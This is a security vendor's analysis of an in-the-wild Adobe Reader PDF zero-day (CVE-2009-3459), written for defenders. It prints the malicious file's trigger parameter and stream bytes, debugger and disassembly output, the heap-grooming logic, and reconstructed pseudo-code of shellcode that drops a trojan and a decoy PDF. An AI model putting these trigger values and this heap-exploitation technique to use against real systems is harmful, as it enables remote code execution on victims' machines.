Smashing Adobe's Heap Memory Management Systems for Profit.

In-depth research on the recent PDF zero-day exploit

Research and Analysis: Haifei Li
Editors: Guillaume Lovet (Editing & Overview), Derek Manky

Introduction

As pointed in a recent blog post, PDF vulnerabilities are receiving an increasing amount of attention in the security industry, matching cybercriminal patterns.

Very recently, a new high-risk PDF zero-day vulnerability (CVE-2009-3459), was reported on Adobe's blog as being exploited in the Wild, in the frame of a targeted attack.

As of writing, a vendor patch is available, and we highly recommend applying it. If for some reason, immediate patching raises issues, security equipments (AV, IDS, IPS, etc...) must be adjusted to block potentially malicious PDF documents leveraging this vulnerability.

For that purpose, this document will provide an analysis of one malicious PDF file found in the wild, as well as in-depth insights on that vulnerability.


Overview

PDF files are mostly made of tags, parameters, and streams, and can include javascript code. This vulnerability stems from an integer overflow when Adobe Reader processes a particular parameter.

Now, integer overflows are fairly common, but leveraging them into execution of arbitrary code is often tremendously difficult and crafty. Whoever is behind this exploit managed to do it, introducing in the process a rather innovative strategy (not universal though, it works only on Adobe Reader). There are 5 essential steps in the exploit:

  • A parameter in the PDF file is set to a particular high value. Adobe Reader uses that parameter for an operation, resulting in an integer overflow. Consequence: the result value of that operation is smaller than the program would expect, given the value of the parameter.
  • That overflowed value is used to allocate a buffer on the Heap. The buffer is consequently smaller than it should be, given the parameter value.
  • The program follows its normal flow, which is to "adjust" contents of the aforementioned buffer according to information bit-encoded in a stream within the PDF document. This results in memory on the heap being overwritten (Heap overflow), since the processed stream is longer than the small allocated buffer.
  • Because the bitstream controlling those "adjustments" is provided by the attacker (it's in the PDF document), it is carefully tailored to overwrite just a tiny part of the heap memory. Because the possible "adjustments" are very limited, the best the attacker could do was shift a function pointer (within a C-style structure located on the heap) by 1 single byte. This function pointer is ultimately called, used as a transfer point to malicious code (controlling the EIP). Of course, changing the effective value of this function pointer through the 1 byte shift is the hardest part, and quite innovative. How to ensure that malicious code will sit here when the execution flow is eventually transferred, following the function pointer?
  • By spraying the heap with chunks of NOP slides ending with the desired shellcode. This is achieved with javascript embedded in the PDF file (typical heap spraying method).

The steps above will be studied in section 1 and 2.

Some would say that what happens once the attacker has gained control of the execution flow is mere literature. It indeed pertains to the studied attack specifics, not to the exploit in general: the payload of this attack will be addressed in section 3.


Section 1: The Vulnerability

The parameter triggering the initial integer overflow (thus the exploit) sits in the following section within in the malicious PDF:


<<
/ParamX 1073741838			//the key parameter
>>
/Length 299
/Filter /FlateDecode
>>
stream
[stream encoded by flate, original stream is: 00 00 20 00 00 00 10]
endstream

ParamX is the key parameter, and is set to 1073741838 (or 0x4000000E in hexadecimal). Note that the encoded stream is irrelevant, since at the point of execution when the overflow occurs, it has been decoded (ie "deflated") already.

The decoded, original stream is: 00 00 20 00 00 00 10.

After long and thorough debugging sessions, we finally came to this point, where the key parameter (0x4000000E) is being used:



Figure 1: The point of the vulnerability: Integer overflow

Figure 1 above shows that the process uses the parameter value 0x4000000E (sitting in ECX) at instruction 009F60A5h (highlighted in red). This instruction's goal is seemingly to compute the amount of memory in bytes needed if one DWORD (4 bytes) is allocated per item. This is counted by the key param (which means that the param most likely represents a number of items).

That is why the param value is multiplied by 4, and this is where the integer overflow occurs.

Highlighted in black background and red foreground on Figure 1 is instruction 009F60E5h, which is a call to the memory allocation routine using the overflowed value (as the value of EDX and ECX at 009F60D8h are both 0):

acro_allocate_routine (0x4000000E*4+0x48) ==> acro_allocate_routine (0x80)

Note: We will discuss the "acro_allocate_routine" function in section 2.3.

As a result, a heap block of 0x80 is allocated; it will be processed by function 009F7ED0 called at the highlighted instruction on Figure 2 below:



Figure 2: Before the heap overflow

This function is listed and analyzed below. For a better comprehension of the comments (which are the most important part in the listing), pease note that:



  1. lpBuff is the pointer of the heap block (0x80 length).
  2. bits_original_stream is the number of bits in the decoded stream.
  3. v_counter is the current value of the counter, from 0 to bits_original_stream-1.


Again, the decoded stream was "00 00 20 00 00 00 10", which means bits_original_stream is 0x38 (7*8).

The listing follows:


.text:003A7FB4 loc_3A7FB4:                             ; CODE XREF: sub_3A7ED0+1CDj
.text:003A7FB4                 mov     edx, [esp+3Ch+var_C] ; loop starts
.text:003A7FB8                 mov     eax, [esp+3Ch+arg_0]
.text:003A7FBC
.text:003A7FBC loc_3A7FBC:                             ; CODE XREF: sub_3A7ED0+E2j
.text:003A7FBC                 cmp     eax, ecx 	; if v_counter>=bits_original_stream,
.text:003A7FBE                 jge     loc_3A80A3	; break from the loop
.text:003A7FC4                 mov     ebp, [esi+0Ch]	; [esi+0Ch] is 4000000Eh here
.text:003A7FC7                 add     eax, edi		; edi is 0
.text:003A7FC9                 add     eax, edx		; edx is 0
.text:003A7FCB                 cdq
.text:003A7FCC                 idiv    ebp	; v_counter idiv 4000000Eh
.text:003A7FCE                 lea     eax, [ecx+edi]	; edx became v_counter
.text:003A7FD1                 mov     ecx, [esi+10h]
.text:003A7FD4                 cmp     ecx, 3
.text:003A7FD7                 lea     ebx, [esi+edx*4+44h]          ; lpBuff + v_counter*4 + 0x44

...

.text:003A805C loc_3A805C:                             ; CODE XREF: sub_3A7ED0+168j
.text:003A805C                 mov     edx, [ebx]
.text:003A805E                 push    edx
.text:003A805F                 mov     edx, [esp+40h+var_20]
.text:003A8063                 shl     eax, cl
.text:003A8065                 push    edx
.text:003A8066                 mov     edx, [esp+44h+var_28]
.text:003A806A                 shl     ebp, cl
.text:003A806C                 push    ebp
.text:003A806D                 push    eax
.text:003A806E                 mov     eax, [esp+4Ch+arg_0]
.text:003A8072                 add     eax, edi
.text:003A8074                 shl     eax, cl
.text:003A8076                 push    edx
.text:003A8077                 call    sub_9D7850      ; will be analyzed later
.text:003A807C                 add     esp, 14h
.text:003A807F
.text:003A807F loc_3A807F:                             ; CODE XREF: sub_3A7ED0+18Aj
.text:003A807F                 mov     [ebx], eax 	; overwrite the DWORD with the return value
.text:003A8081
.text:003A8081 loc_3A8081:                             ; CODE XREF: sub_3A7ED0+149j
.text:003A8081                                         ; sub_3A7ED0+163j
.text:003A8081                 mov     eax, [esp+3Ch+arg_0]
.text:003A8085                 add     [esp+3Ch+var_18], 2
.text:003A808A                 add     [esp+3Ch+var_1C], 1
.text:003A808F                 mov     ecx, [esp+3Ch+arg_4]
.text:003A8093                 add     eax, 1          ; v_counter++
.text:003A8096                 cmp     eax, [esi+0Ch] ; [ESI+0C]=0x4000000E, so keep looping
.text:003A8099                 mov     [esp+3Ch+arg_0], eax
.text:003A809D                 jl      loc_3A7FB4      ; loop


So what does this function do? It might be easier to grasp a feeling of its goal from the following pseudo-code:


for(;;) {
	if( v_counter >=  bits_original_stream ) break;
	tmp_counter = v_counter % ParamX;
	lpCurrent = lpBuff + tmp_counter * 4 + 0x44;
	iRetVal = mystery_func( *lpCurrent, variables...);
	*lpCurrent = iRetVal;
	v_counter++;
	if( v_counter >= ParamX ) break;
}


Essentially, the function slides over each DWORD in the buffer (remember, the buffer is supposed to contain one DWORD per item listed by ParamX), overwriting it with the result of a "mystery function" (mysterious as of yet, but we'll address it in section 2.1) at instruction 003A807F.

This is where the heap overflow occurs, and this is the operational heart of the exploit. Because of the integer overflow, the buffer is actually a lot smaller than expected; it should contain one DWORD per item of ParamX, but it does not, thus when the counter enumerates items, it goes past the buffer's end.

It is interesting to note that the loop only exits when the counter reaches bits_original_stream: v_counter >= ParamX will never happen, because of the huge value of ParamX. We will see afterwards that the original stream bits are used by the mystery function, one per item.

The total length of the memory being written is therefore bits_original_stream * 4 (starts from offset 0x44):

0x38*4 = 0xE0

Considering that the length of the heap block which was allocated before (Figure 1) is only 0x80, the function will overwrite 0xA4 (0x44+0xE0-0x80) bytes beyond the allocated heap block.

Monitoring these 0xA4 bytes of overflowed memory, shows that actually very few memory values were changed. This is apparent on Figure 3 below:



Figure 3: After the heap overflow

Indeed, comparing it with Figure 2 above (before the heap overflow), we see that only 2 DWORDs were modified by the heap overflow (Note: offset is relative to the end of the allocated heap block):



  1. Offset 0x0C, from 0x0121676C to 0x0121676D.
  2. Offset 0x90, from 0x0124DA40 to 0x0124DA41.


How and why those two slight modifications occur form the logical heart of the exploit. This is addressed in the next section.


Section 2: The Exploitation

As we evoked above, the overflowed memory is set by the mystery function, which uses the (attacker-provided) decoded stream.


2.1: The Mystery Function


.text:009D7884                 mov     esi, edi        ; edi is v_counter
.text:009D7886                 sar     esi, 3          ; v_counter/8
.text:009D7889                 add     esi, [esp+1Ch+lp_original_stream] ; pass how many bytes
.text:009D788D                 mov     ecx, edi
.text:009D788F                 movzx   edx, byte ptr [esi] ; read next byte
.text:009D7892                 and     ecx, 7      ; pass how many bits in the next byte
.text:009D7895                 mov     eax, 8
.text:009D789A                 sub     eax, ecx
.text:009D789C                 sub     eax, ebp        ; ebp is always 1
.text:009D789E                 mov     cl, al
.text:009D78A0                 shr     edx, cl    	; set the lowest bit as the corresponding bit
.text:009D78A2                 and     edx, [esp+1Ch+var_8] ; var_8 is always 1, so corresponding bit is the DWORD value
.text:009D78A6                 cmp     [esp+1Ch+arg_C], 0 ; arg_C is always 0
.text:009D78AC                 jz      short loc_9D78BC ; jump

...

.text:009D78BC loc_9D78BC:                             ; CODE XREF: sub_9D7850+5Cj
.text:009D78BC                 mov     ecx, [esp+1Ch+arg_10]; get the old_DWORD
.text:009D78C0                 add     ecx, edx        ; new_DWORD = old_DWORD + corresponding-bit
.text:009D78C2                 mov     edx, ecx
.text:009D78C4
.text:009D78C4 loc_9D78C4:                             ; CODE XREF: sub_9D7850+6Aj
.text:009D78C4                 and     dl, [esp+1Ch+var_9]
.text:009D78C8                 add     edi, [esp+1Ch+arg_8]
.text:009D78CC                 mov     [esp+1Ch+arg_10], ecx 	; save the new_DWORD

...

.text:009D78E5                 mov     eax, [esp+18h+arg_10] 	; return the new_DWORD

In short, the function first retrieves a bit in the decoded stream by using the current counter's value (v_counter); as explained earlier, we can consider that each item in the buffer has a corresponding bit in the stream, thus we'll call this bit "corresponding_bit".

This bit is then converted into a DWORD and added to the DWORD (representing an item) being processed:

new_DWORD = old_DWORD + corresponding_bit

As a matter of course, corresponding_bit can only be 1 or 0. Thus the new DWORD cannot be set to an arbitrary value: either it remains unchanged, or it is incremented by 1. That is all the attacker can control, via the bitstream.

Since the original stream is '00 00 20 00 00 00 10', only the bits at position 0x12 and 0x33 are set to 1. Thus only the two DWORDs located at position 0x12 and 0x33 will be incremented.

Relative to the end of the 0x80-length heap block, those DWORDs sit at the following offsets:

offset1 = 0x12*4 + 0x44 - 0x80 = 0x0C
offset2 = 0x33*4 + 0x44 - 0x80 = 0x90

This matches what we observed at the end of section 1 above. So, what are those two DWORDs, and why increment them?


2.2: Taking Control of the Execution Flow

After many experiments, no matter what the memory situation was, it appeared that one of these two DWORDs was a pointer. This pointer will point to a C-style structure in a varying memory location. This structure is used while Adobe Reader is rendering the page within the PDF. Most of the time this is pointer2 (offset2, 0x90) that points to the structure. An example is given below.

First, we check that the pointer at offset 0x90 was incremented during the overflow:


Breakpoint 0 hit
eax=02008b1c ebx=00000001 ecx=0012ed54 edx=0438afcb esi=0438af18 edi=0012eea0
eip=009f7868 esp=0012ed3c ebp=0438afcb iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
AcroRd32!AVAcroALM_IsFeatureEnabled+0x63e09:
009f7868 e863060000      call    AcroRd32!AVAcroALM_IsFeatureEnabled+0x64471 (009f7ed0)
0:000> dd esp
0012ed3c  0012ed54 0438af18 02008b1c 00000000
0012ed4c  0210b734 01f2b424 0438afcb 00a8da8e 
0:000> dd 02008b1c+80+90
02008c2c  0124da40 00000544 0017ee98 ffffffff
02008c3c  00000000 00000000 00000000 00000000

Breakpoint 1 hit
eax=00000000 ebx=00000001 ecx=00000038 edx=00000000 esi=0438af18 edi=0012eea0
eip=009f786d esp=0012ed3c ebp=0438afcb iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
AcroRd32!AVAcroALM_IsFeatureEnabled+0x63e0e:
009f786d 83c40c          add     esp,0Ch
0:000> dd 02008b1c+80+90
02008c2c  0124da41 00000544 0017ee98 ffffffff
02008c3c  00000000 00000000 00000000 00000000

Before the overflow, the structure's pointer is 0x0124da40, after the overflow, it became 0x0124da41.

The following figure then shows how the structure is being referred to after the overflow:



Figure 4: Going into the shellcode

Firstly, the structure address is put into EAX. Then the first DWORD value of the structure is read. If this value is greater than 0x90, then it continues to read the value stored at offset 0x90 (relative to the beginning of the structure): the value at this offset is read as a function pointer and is put into EAX. Finally, if this function pointer is not NULL, it goes into the function.

Thus, the goal of the attacker is really to change the value of this pointer at offset 0x90 of the structure (note: it's just a coincidence that this offset is also 0x90, the same offset used for the pointer to the structure relative to the heap block). This changed function pointer is used to gain control of the execution flow. To do this, the attacker could only increment the pointer to the structure (via the bitstream, see previous section), thus shifting all the values of the structure by one byte. He could not give the function pointer inside the structure an arbitrary value, which makes this exploit quite crafty indeed.

This can be seen by comparing the memory under normal and attack (i.e. when the exploit occurred) conditions. Dumping the structure in normal conditions results in:


0:000> dd 0124da40
0124da40  0000010c 00965450 00968cc0 00aae890
0124da50  01021e10 01024380 01021e40 01024430
0124da60  009671c0 010243e0 00971670 01022e80
0124da70  00a468c0 00970d10 0096f060 00964e80
0124da80  0096f7d0 0096fe30 00961ca0 0095c060
0124da90  010228e0 00000000 00000000 00000000
0124daa0  00000000 00000000 00000000 00000000
0124dab0  00000000 00960420 00000000 00000000
0124dac0  0099f2e0 00970750 009712d0 00971420
0124dad0  00000000 00a03950 00a1ced0 01022c10
0124dae0  01022cc0 01022d40 00000000 00000000

Normal conditions: Even though 0x10c is greater than 0x90, because the function pointer at offset 0x90 (0124dad0) is NULL, nothing will happen.

But under attack conditions, after the heap overflow (pay attention to endian-ness when shifting bytes):


0:000> dd 0124da41
0124da41  50000001 c0009654 9000968c 1000aae8
0124da51  8001021e 40010243 3001021e c0010244
0124da61  e0009671 70010243 80009716 c001022e
0124da71  1000a468 6000970d 800096f0 d000964e
0124da81  300096f7 a00096fe 6000961c e00095c0
0124da91  00010228 00000000 00000000 00000000
0124daa1  00000000 00000000 00000000 00000000
0124dab1  20000000 00009604 00000000 e0000000
0124dac1  500099f2 d0009707 20009712 00009714
0124dad1  50000000 d000a039 1000a1ce c001022c
0124dae1  4001022c 0001022d 00000000 00000000

Because 0x50000001 is greater than 0x90, and 0x50000000 is not zero, the control flow will be transferred to 0x50000000.

It should be noted that as per our tests, sometimes it is pointer1 (offset 0x0C relative to the end of the 0x80-length heap block) that points to the structure , which is why the attacker increments that pointer as well.

The attacker did not change any other DWORDs because changing those two is the minimum necessary condition under which the exploit will run. Changing any other DWORDs may cause the application to crash before reaching control of the EIP.


2.3: The Heap Spray

As pointed above, the attacker does not precisely control the point where the ultimate function pointer will branch. He can only have it pointing to 0x50000000. Luckily for him, this generally belongs to the heap. Therefore, filling the heap with shellcode helps to ensure malicious code execution running from 0x50000000.

This is achieved by a classical heap spray in javascript (Figure 5):



Figure 5: The decoded Javascript using heap spray technology

The shellcode that this script sprays all over the heap will be addressed in section 3, as it is not part of the exploit per se.


2.4: Smashing Adobe's Heap Memory Management System

Why use 0x80 as the bogus heap block allocation length? In other words, why select 0x4000000E as the vulnerable ParamX value?

Generally speaking, heap memory allocations on a Windows system will eventually call the system API RtlAllocateHeap, to apply for a new heap block. In such a situation, memory values around the returned block are unpredictable for the application.

However, Adobe Reader uses its own heap management routine: if the block's length is less than or equal to 0x80 bytes, the request won't be submitted to the system level heap management routine. Instead, Adobe Reader's own memory management routine finds a suitable recycled block matching the requested allocation size.

Following is the relevant code in function "acro_allocate_routine" in "acrord32.dll":


.text:003042DC                 push    offset stru_E886F0 ; lpCriticalSection
.text:003042E1                 mov     [esp+1Ch+allocate_len], offset stru_E886F0
.text:003042E9                 call    ds:EnterCriticalSection
.text:003042EF                 cmp     edi, 80h        ; allocate_len>0x80?
.text:003042F5                 mov     [esp+18h+var_4], 0
.text:003042FD                 ja      short loc_30433B ; allocate_len=0x80, no jumping here
.text:003042FF                 movzx   eax, ds:byte_BFD898[edi]
.text:00304306                 mov     ecx, [esi+eax*4+0Ch] 	; get structure pointer which manages all recycled 0x80-length blocks
.text:00304306                                         	
.text:0030430A                 mov     eax, [ecx+4]    	; the first recycled 0x80-length block
.text:0030430D                 test    eax, eax
.text:0030430F                 jz      short loc_30432F
.text:00304311                 mov     esi, eax
.text:00304313                 mov     eax, [eax+4]    	; next block
.text:00304316                 test    eax, eax
.text:00304318                 mov     edx, [esi-4]
.text:0030431B                 mov     [ecx+4], eax    	; take off the first block from the list
.text:0030431E                 jz      short loc_304326 	; how many recycled blocks have been reused
.text:00304320                 mov     dword ptr [eax], 0
.text:00304326
.text:00304326 loc_304326:                             ; CODE XREF: acro_allocate_routine+7Ej
.text:00304326                 add     dword ptr [edx+4], 1 ; how many recycled blocks have been reused
.text:0030432A                 jmp     loc_3043C4      ; exit, return the first block for use

It can be observed that it does not go into the system level's management routine to allocate a new heap block; instead, it reuses the heap block which has just been marked as "freed" by the application itself (in other words, the system actually does not free this memory).

Because of this, the memory values around this reused block can be fairly easily predicted (or at least stay relatively stable).

And this indicates a pretty effective method to exploit heap based overflow vulnerabilities on Adobe Reader.


Section 3: Post-Exploit Activity & Embedded Shellcode

The shellcode in the Javascript piece just does one thing: locate and execute another shellcode in the PDF.

Remarkably, the shellcode seeks out the PDF file handle, testing all available handles starting from 0, comparing each to the target size by using the API function GetFileSize:



Figure 6: Shellcode is searching for the file handle of the POC file

The original C code may have looked like:


DWORD dwTestHandle=0;

//test all the handles, with step 4.
while (1)
{
	dwFileSize = GetFileSize(dwTestHandle,0);
	if ((dwFileSize != -1) && (dwFileSize>=0x2000))
	{
		break;
	}
	dwTestHandle = dwTestHandle +4;
}
//obtain the self file handle successfully

Then, it uses the obtained file handle to locate and execute the new shellcode embedded within the PDF file:



Figure 7: Shellcode is jumping to another shellcode inside the POC

As a side note, this is not new. The "Phantom Team" used this "shellcode seek and execute" strategy in a malicious PDF over a year ago.

The new shellcode will perform the following activities:


  1. Drop an executable file from the initial PDF file, and execute it. This is actually a trojan which is detected by our Antivirus products as "W32/Protux.GK!tr".
  2. Drop a "normal", harmless PDF from the initial PDF file, open it with Adobe Reader, and rewrite the currently opened malicious PDF with the same content as the dropped normal PDF: this achieves a perfect camouflage effect. In the occurrence we studied, the disguised file was named "The question of the charter of pro-democracy moment.pdf", located in the Windows temporary directory.

Following are the key points of the new shellcode:



Figure 8: Step #1 - Drop the exe file to the temp directory


Figure 9: Step #2 - Execute the dropped exe file


Figure 10: Step #3 - Drop the disguised PDF file


Figure 11: Step #4 - Open the disguised PDF with Adobe Reader

Conclusion

Taking a look back over this 0-day attack as a whole, each single part of it is somehow ingenious - whether it be the vulnerability, operational exploitation, the logic behind it, the way to leverage it or the final shellcode. The exploitation method through the heap overflow, which may also be used in future Adobe Reader exploits, is particularly innovative in itself.

FortiGuard Labs has released advisory FGA-2009-35 to respond to this issue, coordinating with Adobe's Security Advisory APSB09-15. Advanced zero-day protection was available to our customers since October 9th, 2009. The vulnerability can be detected by our IPS signature "Adobe.Reader.Decode.Color.Remote.Code", while our antivirus detects the PDF exploit as "W32/Protux.GK!exploit" and the dropped executable file as "W32/Protux.GK!tr". We nonetheless recommend again that all Adobe Reader and Acrobat users update their application to the latest version as soon as possible.